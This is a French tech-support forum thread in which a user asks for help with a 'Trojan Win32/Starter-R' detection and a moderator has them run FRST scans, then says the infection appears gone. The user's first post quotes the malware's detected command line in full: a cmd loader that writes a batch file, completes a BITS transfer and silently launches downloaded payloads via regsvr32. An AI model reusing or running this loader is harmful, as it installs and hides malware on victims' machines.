Menu

Trojan win32 starter R - impossible à éradiquer [Résolu]

Messages postés
3
Date d'inscription
mardi 23 octobre 2018
Dernière intervention
24 octobre 2018
- - Dernière réponse : Val.b2
Messages postés
3
Date d'inscription
mardi 23 octobre 2018
Dernière intervention
24 octobre 2018
- 24 oct. 2018 à 00:23
Bonjour,
Voilà depuis quelques jours que j'essaie (en vain) de supprimer un trojan. J'ai tenté plusieurs tentatives (scan complet avec ESET, microsoft safety scanner, windows defender en mode sans échec) mais résultats : toujours 0 fichiers infectés.
Alors que Windows defender me trouve régulièrement un fichier infecté (trojan Win32/starter-R : CmdLine: \Device\HarddiskVolume3\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\c905dede-7603-1\x.bat" & echo bitsadmin /complete c905dede-7603-1 ^> nul >> "C:\ProgramData\c905dede-7603-1\x.bat" & echo bitsadmin /cancel c905dede-7603-1 ^> nul >> "C:\ProgramData\c905dede-7603-1\x.bat" & echo if exist "C:\ProgramData\c905dede-7603-1\c905dede-7603-1.d" goto q >> "C:\ProgramData\c905dede-7603-1\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\c905dede-7603-1\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=3808fcc8c905dede " "C:\ProgramData\c905dede-7603-1\%i" >> "C:\ProgramData\c905dede-7603-1\x.bat")) > nul & echo :q >> "C:\ProgramData\c905dede-7603-1\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=3808fcc8c905dede " "C:\ProgramData\c905dede-7603-1\c905dede-7603-1.d" >> "C:\ProgramData\c905dede-7603-1\x.bat" & echo del "C:\ProgramData\c905dede-7603-1\x.bat" ^& exit >> "C:\ProgramData\c905dede-7603-1\x.bat" & "C:\ProgramData\c905dede-7603-1\x.bat"") qu'il place en quarantaine automatiquement

Je pense que mon PC est depuis sérieusement ralenti.

Merci de votre aide
Bonne journée
Afficher la suite 

Votre réponse

4 réponses

Messages postés
163328
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur
Dernière intervention
21 février 2019
21359
0
Merci
Salut,

Donne le rapport de scan NOD32 et :

Pour vérifier l'ordinateur, je t'invite à faire cette analyse FRST et donner les rapports en retour :

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.

Trois rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ afin de les partager.
En retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.


Commenter la réponse de Malekal_morte-
Messages postés
3
Date d'inscription
mardi 23 octobre 2018
Dernière intervention
24 octobre 2018
0
Merci
Bonjour,
Ci joint mes 4 rapports (3 rapport de FRST et une capture d'écran de NOD32)

https://pjjoint.malekal.com/files.php?id=FRST_20181023_i6i7o5f13q9
https://pjjoint.malekal.com/files.php?id=20181023_j15x6j11k12s7
https://pjjoint.malekal.com/files.php?id=20181023_d5t12x11r15u13

https://pjjoint.malekal.com/files.php?id=20181023_t7r8b14c9b15

Je ne sais pas si mon ordinateur est bien infecté ou si c'est un faux positif car tout les scans antivirus rendent un résultat négatif
Commenter la réponse de Val.b2
Messages postés
163328
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur
Dernière intervention
21 février 2019
21359
0
Merci
Non pas un faux positif mais tu sembles l'avoir éradiqué.

CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Si tu veux le garder, désactive la surveillance de CCleaner, inutile, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/

Apparemment, tu as créé un sujet sur un autre forum.
Ca ne sert à rien de multiplier les demandes.

Commenter la réponse de Malekal_morte-
Messages postés
3
Date d'inscription
mardi 23 octobre 2018
Dernière intervention
24 octobre 2018
0
Merci
Bonjour,
Je vais supprimer Ccleaner.
Merci pour votre réponse
Commenter la réponse de Val.b2